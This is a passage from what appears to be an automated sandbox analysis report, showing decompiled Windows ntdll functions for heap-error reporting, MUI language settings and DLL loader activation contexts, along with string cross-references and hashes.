				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0539B150();
					} else {
						E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0539B150("Parameter3: %p\n",  *0x54858ac);
				}
				_t119 =  *0x54858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0539B150();
					} else {
						E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x54858b4);
					E0539B150("Last known valid blocks: before - %p, after - %p\n",  *0x54858b0);
				} else {
					_t120 =  *0x54858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0539B150();
				} else {
					E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0539B150("Stack trace available at %p\n", 0x54858c0);
			}

0x05451c10
0x05451c16
0x05451c1e
0x05451c3d
0x05451c3e
0x05451c20
0x05451c35
0x05451c3a
0x05451c44
0x05451c55
0x05451c5a
0x05451c65
0x05451c67
0x00000000
0x05451c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05451c67
0x05451cdc
0x05451ce5
0x05451d04
0x05451d05
0x05451ce7
0x05451cfc
0x05451d01
0x05451d0b
0x05451d17
0x05451d1f
0x05451d25
0x05451d30
0x05451d4f
0x05451d50
0x05451d32
0x05451d47
0x05451d4c
0x05451d61
0x05451d67
0x05451d68
0x05451d6e
0x05451d79
0x05451d98
0x05451d99
0x05451d7b
0x05451d90
0x05451d95
0x05451daa
0x05451db0
0x05451db1
0x05451db7
0x05451dc2
0x05451de1
0x05451de2
0x05451dc4
0x05451dd9
0x05451dde
0x05451df3
0x05451df9
0x05451dfa
0x05451e00
0x05451e0a
0x05451e13
0x05451e32
0x05451e33
0x05451e15
0x05451e2a
0x05451e2f
0x05451e39
0x05451e4a
0x05451e02
0x05451e02
0x05451e08
0x00000000
0x00000000
0x05451e08
0x05451e5b
0x05451e7a
0x05451e7b
0x05451e5d
0x05451e72
0x05451e77
0x05451e95

Strings

heap_failure_entry_corruption, xrefs: 05451C83
HEAP: , xrefs: 05451C16, 05451C3D, 05451D04, 05451D4F, 05451D98, 05451DE1, 05451E32, 05451E7A
heap_failure_listentry_corruption, xrefs: 05451CD0
Parameter1: %p, xrefs: 05451D5C
heap_failure_generic, xrefs: 05451C7C
Error code: %d - %s, xrefs: 05451D12
heap_failure_block_not_busy, xrefs: 05451CA6
heap_failure_freelists_corruption, xrefs: 05451CC9
heap_failure_buffer_underrun, xrefs: 05451C9F
HEAP[%wZ]: , xrefs: 05451C30, 05451CF7, 05451D42, 05451D8B, 05451DD4, 05451E25, 05451E6D
heap_failure_buffer_overrun, xrefs: 05451C98
heap_failure_invalid_argument, xrefs: 05451CAD
heap_failure_virtual_block_corruption, xrefs: 05451C91
Stack trace available at %p, xrefs: 05451E86
heap_failure_unknown, xrefs: 05451C75
heap_failure_cross_heap_operation, xrefs: 05451CC2
Parameter2: %p, xrefs: 05451DA5
heap_failure_multiple_entries_corruption, xrefs: 05451C8A
Last known valid blocks: before - %p, after - %p, xrefs: 05451E45
heap_failure_internal, xrefs: 05451C6E
heap_failure_usage_after_free, xrefs: 05451CBB
heap_failure_invalid_allocation_type, xrefs: 05451CB4
Parameter3: %p, xrefs: 05451DEE
heap_failure_lfh_bitmap_mismatch, xrefs: 05451CD7
Heap error detected at %p (heap handle %p), xrefs: 05451C50

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: e01e7f0135b0d3ca57ed505cdb506d0cf8e7fcfeeaa91a67fff3b203caaf0a05
Instruction ID: f62d1f10035b4072586522070c4ea8a6ae3328131b044940917062ee32b23e9d
Opcode Fuzzy Hash: e01e7f0135b0d3ca57ed505cdb506d0cf8e7fcfeeaa91a67fff3b203caaf0a05
Instruction Fuzzy Hash: 4F610B76618644EFC61AE744E499FB5B3B9EB00D30B09407BFC0E5B312C674A851EB0A

Uniqueness

Uniqueness Score: -1.00%

Function 053A3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E053A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E053A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E053A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E053A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E053A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E053A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L053B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E053DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E053E1370(_t276, 0x5374e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E053DBB40(0,  &_v68, _t170);
									if(L053A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E053DBB40(_t257,  &_v68, _t243);
								if(L053A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E053E1370(_t278, 0x5374e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L053B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E053DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E053E1370(_v16, 0x5374e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E053DBB40(_t262,  &_v68, _t244);
								if(L053A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E053E1370(_t282, 0x5374e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E053DBB40(_t262,  &_v68, _t201);
							if(L053A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L053B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E053DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E053E1370(_t280, 0x5374e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E053DBB40(_t267,  &_v68, _t245);
							if(L053A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E053E1370(_t284, 0x5374e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E053DBB40(_t267,  &_v68, _t224);
						if(L053A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x053a3d3c
0x053a3d42
0x053a3d44
0x053a3d46
0x053a3d49
0x053a3d4c
0x053a3d4f
0x053a3d52
0x053a3d55
0x053a3d58
0x053a3d5b
0x053a3d5f
0x053a3d61
0x053a3d66
0x053f8213
0x053f8218
0x053a4085
0x053a4088
0x053a408e
0x053a4094
0x053a409a
0x053a40a0
0x053a40a6
0x053a40a9
0x053a40af
0x053a40b6
0x053a40bd
0x053a40bd
0x053a3d83
0x053f821f
0x053f8229
0x053f8238
0x053f8238
0x053f823d
0x053f823d
0x053a3da0
0x053a3daf
0x053a3db5
0x053a3dba
0x053a3dba
0x053a3dd4
0x053a3e94
0x053a3eab
0x053a3f6d
0x053a3f84
0x053a406b
0x053a406b
0x053a406e
0x053a406e
0x053a4070
0x053a4074
0x053f8351
0x053f8351
0x053a407a
0x053a407f
0x053f835d
0x053f8370
0x053f8377
0x053f8379
0x053f837c
0x053f837c
0x053f835d
0x00000000
0x053a407f
0x053a3f8a
0x053a3f8d
0x053a3f90
0x053a3f95
0x053f830d
0x053f830f
0x053a3f9b
0x053a3fac
0x053a3fae
0x053a3fb1
0x053a3fb1
0x053a3fb6
0x053f8317
0x053f831a
0x00000000
0x053a3fbc
0x053a3fc1
0x053a3fc9
0x053a3fd7
0x053a3fda
0x053a3fdd
0x053a4021
0x053a4021
0x053a4029
0x053a4030
0x053a4044
0x053a4046
0x053a4046
0x053a4044
0x053a4049
0x053f8327
0x053f8334
0x053f8339
0x053f833c
0x053a404f
0x053a404f
0x053a404f
0x053a4051
0x053a4056
0x053a4063
0x053a4063
0x053a4068
0x00000000
0x053a4068
0x053a3fdf
0x053a3fe2
0x053a3fe4
0x053a3fe7
0x053a3fef
0x053a4003
0x053a4005
0x053a4005
0x053a400c
0x053a4013
0x053a4016
0x053a4017
0x053a401b
0x053a401e
0x00000000
0x053a401e
0x053a3fb6
0x053a3eb1
0x053a3eb4
0x053a3eb7
0x053a3ebc
0x053f82a9
0x053f82ab
0x053a3ec2
0x053a3ed3
0x053a3ed5
0x053a3ed8
0x053a3ed8
0x053a3edd
0x053f82b3
0x053f82b6
0x00000000
0x053a3ee3
0x053a3ee8
0x053a3eed
0x053a3ef0
0x053a3ef3
0x053a3f02
0x053a3f05
0x053a3f08
0x053f82c0
0x053f82c3
0x053f82c5
0x053f82c8
0x053f82d0
0x053f82e4
0x053f82e6
0x053f82e6
0x053f82ed
0x053f82f4
0x053f82f7
0x053f82f8
0x053f82fc
0x053f82ff
0x053f82ff
0x053a3f0e
0x053a3f11
0x053a3f16
0x053a3f1d
0x053a3f31
0x053f8307
0x053f8307
0x053a3f31
0x053a3f39
0x053a3f48
0x053a3f4d
0x053a3f50
0x053a3f50
0x053a3f53
0x053a3f58
0x053a3f65
0x053a3f65
0x053a3f6a
0x00000000
0x053a3f6a
0x053a3edd
0x053a3dda
0x053a3ddd
0x053a3de0
0x053a3de5
0x053f8245
0x053a3deb
0x053a3df7
0x053a3dfc
0x053a3dfe
0x053a3e01
0x053a3e01
0x053a3e06
0x053f824d
0x053f824f
0x053f8254
0x00000000
0x053a3e0c
0x053a3e11
0x053a3e16
0x053a3e19
0x053a3e29
0x053a3e2c
0x053a3e2f
0x053f825c
0x053f825f
0x053f8261
0x053f8264
0x053f826c
0x053f8280
0x053f8282
0x053f8282
0x053f8289
0x053f8290
0x053f8293
0x053f8294
0x053f8298
0x053f829b
0x053f829b
0x053a3e35
0x053a3e38
0x053a3e3d
0x053a3e44
0x053a3e58
0x053f82a3
0x053f82a3
0x053a3e58
0x053a3e60
0x053a3e6f
0x053a3e74
0x053a3e77
0x053a3e77
0x053a3e7a
0x053a3e7f
0x053a3e8c
0x053a3e8c
0x053a3e91
0x00000000
0x053a3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 053A3DC0
Kernel-MUI-Language-SKU, xrefs: 053A3F70
Kernel-MUI-Number-Allowed, xrefs: 053A3D8C
WindowsExcludedProcs, xrefs: 053A3D6F
Kernel-MUI-Language-Disallowed, xrefs: 053A3E97

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: b5aad47090da7db514d144cab96f476b2294f179e631b90b8217f772ffd552e1
Instruction ID: 5ab8870750dbe0ff4a9baa46a869410285524df64f1f7ef51566a503fb124de4
Opcode Fuzzy Hash: b5aad47090da7db514d144cab96f476b2294f179e631b90b8217f772ffd552e1
Instruction Fuzzy Hash: 17F14A72E00618EBCF15DF98C984EEEFBB9FF48650F15406AE505A7650D7B4AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053C8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E053C8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x548d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x5488464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x5485780 & 0x00000003) != 0) {
							E05415510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x5485780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E053DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x5487984; // 0x32f2ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x5488464; // 0x74b10110
					 *0x548b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E053C9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x5485780 & 0x00000005) != 0) {
						_push(_t49);
						E05415510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x053c8e0f
0x053c8e16
0x053c8e19
0x053c8e1b
0x053c8e21
0x053c8e7f
0x053c8e85
0x05409354
0x0540936c
0x05409371
0x0540937b
0x05409381
0x05409381
0x0540937b
0x053c8e9d
0x053c8e9d
0x053c8e29
0x053c8e2c
0x053c8e38
0x053c8e3e
0x053c8e43
0x053c8eb5
0x053c8eb9
0x054092aa
0x054092af
0x054092e8
0x054092e8
0x054092af
0x053c8eb9
0x053c8e45
0x053c8e53
0x053c8e5b
0x053c8e5f
0x053c8e78
0x053c8e78
0x053c8e7d
0x053c8ec3
0x053c8ecd
0x053c8ed2
0x053c8ed2
0x053c8ec5
0x053c8ec5
0x00000000
0x053c8e7d
0x053c8e67
0x053c8ea4
0x0540931a
0x00000000
0x00000000
0x05409320
0x053c8ea4
0x053c8e70
0x05409325
0x05409340
0x05409345
0x05409345
0x053c8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0540933B, 05409367
Querying the active activation context failed with status 0x%08lx, xrefs: 05409357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0540932A
LdrpFindDllActivationContext, xrefs: 05409331, 0540935D

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 3e524ac791e4649ffc3cb573ba30184b244f36acda95742b413343adeef9ea2f
Instruction ID: 6e02d60bce5dff1a09db983af09f438529f1ffd5f44ecd59414171ce411b0d97
Opcode Fuzzy Hash: 3e524ac791e4649ffc3cb573ba30184b244f36acda95742b413343adeef9ea2f
Instruction Fuzzy Hash: 9A416E32E00319AFDB35AA788889EB9FF76B742644F0545EEE80557191EBF06E80C781

Uniqueness

Uniqueness Score: -1.00%

Function 053A8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E053A8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E053A934A() != 0) {
								_t159 = E0541A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x5485780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E05415510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x5485780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E053A849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E053A8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E053A8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x5485c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x5485c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E053B2280(_t92, 0x54886cc);
															_t94 = E05469DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E053C61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x5485c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E053A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x5485c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x5485c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E053DF380(_t136, 0x5371184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E053B2280(_t108, 0x54886cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E053C61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
